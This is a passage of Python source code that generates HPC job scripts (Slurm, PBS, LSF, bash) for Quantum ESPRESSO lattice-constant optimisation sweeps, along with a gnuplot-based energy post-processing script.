range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
if nc >= 2:
# optimize both a and c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${a}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}-${c}.in > relax-${a}-${c}.out\n")
fout.write(" done\n")
else:
# only optimize a
fout.write(" cp relax.in.template relax-${a}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c_in} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${a}.in > relax-${a}.out\n")
fout.write("done\n")
else:
# a is not optimized
if nc >= 2:
# only optimize c
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
fout.write(" cp relax.in.template relax-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${a_in} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${c}.in<<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" srun --mpi=pmix_v3 $PMF_PWX < relax-${c}.in > relax-${c}.out\n")
fout.write("done\n")
else:
# neither a or c is optimized
pass
# generate result analysis script
os.system("mkdir -p post-processing")
with open("post-processing/get_energy.sh", 'w') as fout:
fout.write("#!/bin/bash\n")
# the comment
if na >= 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a c energy(Ry)\n")
fout.write("EOF\n")
if na >= 2 and nc < 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: a energy(Ry)\n")
fout.write("EOF\n")
if na < 2 and nc >= 2:
fout.write("cat > energy-latconst.data <<EOF\n")
fout.write("# format: c energy(Ry)\n")
fout.write("EOF\n")
# end
if na >= 2:
# a is optimized
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a[0], range_a[2], a+range_a[1]))
fout.write("do\n")
if nc >= 2:
# both a and c are optimized
fout.write(" for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write(" do\n")
fout.write(" energy=`cat ../relax-${a}-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write(" done\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'latconst(c)'\n")
fout.write("set zlabel 'Energy'\n")
fout.write("splot 'energy-latconst.data'\n")
fout.write("EOF\n")
else:
fout.write(" energy=`cat ../relax-${a}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${a} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(a)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# a is not optimized
if nc >= 2:
# only c is optimized
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c[0], range_c[2], c+range_c[1]))
fout.write("do\n")
fout.write(" energy=`cat ../relax-${c}.out | grep '! total energy' | tail -1`\n")
fout.write(" cat >> energy-latconst.data <<EOF\n")
fout.write("${c} ${energy:32:-2}\n")
fout.write("EOF\n")
fout.write("done\n")
fout.write("cat > energy-latconst.gp<<EOF\n")
fout.write("set term gif\n")
fout.write("set output 'energy-latconst.gif'\n")
fout.write("set title 'Energy Latconst'\n")
fout.write("set xlabel 'latconst(c)'\n")
fout.write("set ylabel 'Energy'\n")
fout.write("plot 'energy-latconst.data' w l\n")
fout.write("EOF\n")
else:
# neither a nor c is optimized
pass
fout.write("gnuplot energy-latconst.gp\n")
#os.system("cd post-processing; bash get_energy.sh; cd ../")
os.chdir("../")
if runopt == "run" or runopt == "genrun":
os.chdir(directory)
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
os.system("bash relax-tetragonal-%d-%d.sh" % (i_batch_a, i_batch_c))
os.chdir("../")
for i_batch_a in range(n_batch_a):
for i_batch_c in range(n_batch_c):
server_handle(auto=auto, directory=directory, jobfilebase="relax-tetragonal-%d-%d" % (i_batch_a, i_batch_c), server=self.run_params["server"])
def abc(self, directory="tmp-qe-opt-abc", runopt="gen", auto=0, range_a=[-0.1, 0.1, 0.01], range_b=[-0.1, 0.1, 0.01], range_c=[-0.1, 0.1, 0.01]):
"""
"""
na = len(np.arange(range_a[0], range_a[1], range_a[2]))
nb = len(np.arange(range_b[0], range_b[1], range_b[2]))
nc = len(np.arange(range_c[0], range_c[1], range_c[2]))
if self.batch_a == None:
# namely all in one batch
self.batch_a = na
else:
pass
if self.batch_b == None:
# namely all in one batch
self.batch_b = nb
else:
pass
if self.batch_c == None:
# namely all in one batch
self.batch_c = nc
else:
pass
if na % self.batch_a == 0:
n_batch_a = int(na / self.batch_a)
else:
n_batch_a = int(na / self.batch_a) + 1
if nb % self.batch_b == 0:
n_batch_b = int(nb / self.batch_b)
else:
n_batch_b = int(nb / self.batch_b) + 1
if nc % self.batch_c == 0:
n_batch_c = int(nc / self.batch_c)
else:
n_batch_c = int(nc / self.batch_c) + 1
#
if os.path.exists(directory):
shutil.rmtree(directory)
os.mkdir(directory)
shutil.copyfile(self.arts.xyz.file, os.path.join(directory, os.path.basename(self.arts.xyz.file)))
#all_upfs = [s for s in os.listdir() if s.split(".")[-1] == "UPF"]
all_file = os.listdir()
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE):
#if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
if re.match("(%s)(.*)(upf)" % element, item, re.IGNORECASE) or re.match("(%s)(_*)(upf)" % element, item, re.IGNORECASE):
shutil.copyfile(item, os.path.join(directory, item))
break
self.arts.pseudo.dir = os.path.abspath(directory)
self.control.set_params({"pseudo_dir": os.path.abspath(directory)})
#
os.chdir(directory)
with open("relax.in.template", 'w') as fout:
self.control.to_in(fout)
self.system.to_in(fout)
self.electrons.to_in(fout)
self.ions.to_in(fout)
coordtype = "crystal" # use crystal here so we could only change cell when opt cell
fout.write("ATOMIC_SPECIES\n")
all_file = os.listdir(self.arts.pseudo.dir)
for element in self.arts.xyz.specie_labels:
for item in all_file:
#if re.match("(%s)(.*)(upf)" % (element), item, re.IGNORECASE):
if item.split(".")[0].lower() == element.lower() or item.split("_")[0].lower() == element.lower():
fout.write("%s %f %s\n" % (element, base.element[element].mass, item))
break
fout.write("\n")
if coordtype == "angstrom":
fout.write("ATOMIC_POSITIONS angstrom\n")
if self.arts.ifstatic == True:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (atom.name, atom.x, atom.y, atom.z))
elif self.arts.ifstatic == False:
for atom in self.arts.xyz.atoms:
fout.write("%s\t%.9f\t%.9f\t%.9f" % (atom.name, atom.x, atom.y, atom.z))
for fix in atom.fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
elif coordtype == "crystal":
# crystal namely fractional coordinate can be convert from cartesian coordinates
# the conversion process is like transformation of presentation in quantum mechanics
# the convmat is bulid to do the conversion
#latcell = np.array(self.xyz.cell)
#latcell = latcell.reshape(3, 3)
latcell = np.array(self.arts.xyz.cell)
convmat = np.linalg.inv(latcell.T)
crystal_coord = np.zeros([self.arts.xyz.natom, 3])
for i in range(self.arts.xyz.natom):
crystal_coord[i] = convmat.dot(np.array([self.arts.xyz.atoms[i].x, self.arts.xyz.atoms[i].y, self.arts.xyz.atoms[i].z]))
#
fout.write("ATOMIC_POSITIONS crystal\n")
if self.arts.ifstatic == True:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f\n" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
elif self.arts.ifstatic == False:
for k in range(self.arts.xyz.natom):
fout.write("%s\t%.9f\t%.9f\t%.9f" % (self.arts.xyz.atoms[k].name, crystal_coord[k, 0], crystal_coord[k, 1], crystal_coord[k, 2]))
for fix in self.arts.xyz.atoms[k].fix:
if fix == True:
fout.write("\t0")
elif fix == False:
fout.write("\t1")
fout.write("\n")
else:
print("===============================================\n")
print("warning: qe.base.arts.to_in():\n")
print("arts.ifstatic could only be True or False\n")
sys.exit(1)
fout.write("\n")
# end crystal type ATOMIC_POSITIONS
# writing KPOINTS to the fout
self.arts.write_kpoints(fout)
# =========================
#
# writing forces act on atoms
if self.arts.atomic_forces_status == True:
self.arts.write_atomic_forces(fout)
# =========================
for i_batch_a in range(n_batch_a):
for i_batch_b in range(n_batch_b):
for i_batch_c in range(n_batch_c):
range_a_start = range_a[0] + i_batch_a * self.batch_a * range_a[2]
range_a_end = range_a[0] + (i_batch_a+1) * self.batch_a * range_a[2] - range_a[2] / 2
# - range_a[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_a_end > range_a[1]:
range_a_end = range_a[1]
range_b_start = range_b[0] + i_batch_b * self.batch_b * range_b[2]
range_b_end = range_b[0] + (i_batch_b+1) * self.batch_b * range_b[2] - range_b[2] / 2
# - range_b[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_b_end > range_b[1]:
range_b_end = range_b[1]
range_c_start = range_c[0] + i_batch_c * self.batch_c * range_c[2]
range_c_end = range_c[0] + (i_batch_c+1) * self.batch_c * range_c[2] - range_c[2] / 2
# - range_c[2] / 2, so that the last value is ignored which is actually the begining of next batch
if range_c_end > range_c[1]:
range_c_end = range_c[1]
a = np.sqrt(self.arts.xyz.cell[0][0]**2+self.arts.xyz.cell[0][1]**2+self.arts.xyz.cell[0][2]**2)
b = np.sqrt(self.arts.xyz.cell[1][0]**2+self.arts.xyz.cell[1][1]**2+self.arts.xyz.cell[1][2]**2)
c = np.sqrt(self.arts.xyz.cell[2][0]**2+self.arts.xyz.cell[2][1]**2+self.arts.xyz.cell[2][2]**2)
# gen llhpc script
with open("opt-abc-%d-%d-%d.slurm" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_b, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" yhrun $PMF_PWX < relax-${a}-${b}-${c}.in > relax-${a}-${b}-${c}.out\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen pbs script
with open("opt-abc-%d-%d-%d.pbs" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#PBS -N %s-%d-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_b, i_batch_c))
fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
if "queue" in self.run_params and self.run_params["queue"] != None:
fout.write("#PBS -q %s\n" %self.run_params["queue"])
fout.write("\n")
fout.write("cd $PBS_O_WORKDIR\n")
fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE $PMF_PWX < relax-${a}-${b}-${c}.in > relax-${a}-${b}-${c}.out\n")
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen local bash script
with open("opt-abc-%d-%d-%d.sh" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${b}-${c}.in | tee relax-${a}-${b}-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen lsf_sz script
with open("opt-abc-%d-%d-%d.lsf_sz" % (i_batch_a,i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("APP_NAME=%s\n" % self.run_params["queue"])
fout.write("NP=%d\n" % (self.run_params["nodes"]*self.run_params["ppn"]))
fout.write("NP_PER_NODE=%d\n" % self.run_params["ppn"])
fout.write("RUN=\"RAW\"\n")
fout.write("CURDIR=$PWD\n")
fout.write("#VASP=/home-yg/Soft/Vasp5.4/vasp_std\n")
fout.write("source /home-yg/env/intel-12.1.sh\n")
fout.write("source /home-yg/env/openmpi-1.6.5-intel.sh\n")
fout.write("cd $CURDIR\n")
fout.write("# starting creating ./nodelist\n")
fout.write("rm -rf $CURDIR/nodelist >& /dev/null\n")
fout.write("for i in `echo $LSB_HOSTS`\n")
fout.write("do\n")
fout.write(" echo \"$i\" >> $CURDIR/nodelist \n")
fout.write("done\n")
fout.write("ndoelist=$(cat $CURDIR/nodelist | uniq | awk \'{print $1}\' | tr \'\n\' \',\')\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
fout.write("c1=%f\n" % self.arts.xyz.cell[2][0])
fout.write("c2=%f\n" % self.arts.xyz.cell[2][1])
fout.write("c3=%f\n" % self.arts.xyz.cell[2][2])
fout.write("for a in `seq -w %f %f %f`\n" % (a+range_a_start, range_a[2], a+range_a_end))
fout.write("do\n")
fout.write("for b in `seq -w %f %f %f`\n" % (b+range_b_start, range_b[2], b+range_b_end))
fout.write("do\n")
fout.write("for c in `seq -w %f %f %f`\n" % (c+range_c_start, range_c[2], c+range_c_end))
fout.write("do\n")
#fout.write(" mkdir relax-${a}-${b}-${c}\n")
fout.write(" cp relax.in.template relax-${a}-${b}-${c}.in\n")
fout.write(" vec11=$(printf \"%-.6f\" `echo \"scale=6; result=${a1} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec12=$(printf \"%-.6f\" `echo \"scale=6; result=${a2} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec13=$(printf \"%-.6f\" `echo \"scale=6; result=${a3} * ${a} / ${a_in}; print result\" | bc`)\n")
fout.write(" vec21=$(printf \"%-.6f\" `echo \"scale=6; result=${b1} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec22=$(printf \"%-.6f\" `echo \"scale=6; result=${b2} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec23=$(printf \"%-.6f\" `echo \"scale=6; result=${b3} * ${b} / ${b_in}; print result\" | bc`)\n")
fout.write(" vec31=$(printf \"%-.6f\" `echo \"scale=6; result=${c1} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec32=$(printf \"%-.6f\" `echo \"scale=6; result=${c2} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" vec33=$(printf \"%-.6f\" `echo \"scale=6; result=${c3} * ${c} / ${c_in}; print result\" | bc`)\n")
fout.write(" cat >> relax-${a}-${b}-${c}.in <<EOF\n")
fout.write("\n")
fout.write("CELL_PARAMETERS angstrom\n")
fout.write("${vec11} ${vec12} ${vec13}\n")
fout.write("${vec21} ${vec22} ${vec23}\n")
fout.write("${vec31} ${vec32} ${vec33}\n")
fout.write("EOF\n")
fout.write(" %s $PMF_PWX < relax-${a}-${b}-${c}.in | tee relax-${a}-${b}-${c}.out\n" % self.run_params["mpi"])
fout.write("done\n")
fout.write("done\n")
fout.write("done\n")
# gen cdcloud script
with open("opt-abc-%d-%d-%d.slurm_cd" % (i_batch_a, i_batch_b, i_batch_c), 'w') as fout:
fout.write("#!/bin/bash\n")
fout.write("#SBATCH -p %s\n" % self.run_params["partition"])
fout.write("#SBATCH -N %d\n" % self.run_params["nodes"])
fout.write("#SBATCH -n %d\n" % self.run_params["ntask"])
fout.write("#SBATCH -J %s-%d-%d-%d\n" % (self.run_params["jobname"], i_batch_a, i_batch_b, i_batch_c))
fout.write("#SBATCH -o %s\n" % self.run_params["stdout"])
fout.write("#SBATCH -e %s\n" % self.run_params["stderr"])
fout.write("#\n")
fout.write("export I_MPI_PMI_LIBRARY=/opt/gridview/slurm/lib/libpmi.so\n")
fout.write("a_in=%f\n" % a)
fout.write("b_in=%f\n" % b)
fout.write("c_in=%f\n" % c)
fout.write("a1=%f\n" % self.arts.xyz.cell[0][0])
fout.write("a2=%f\n" % self.arts.xyz.cell[0][1])
fout.write("a3=%f\n" % self.arts.xyz.cell[0][2])
fout.write("b1=%f\n" % self.arts.xyz.cell[1][0])
fout.write("b2=%f\n" % self.arts.xyz.cell[1][1])
fout.write("b3=%f\n" % self.arts.xyz.cell[1][2])
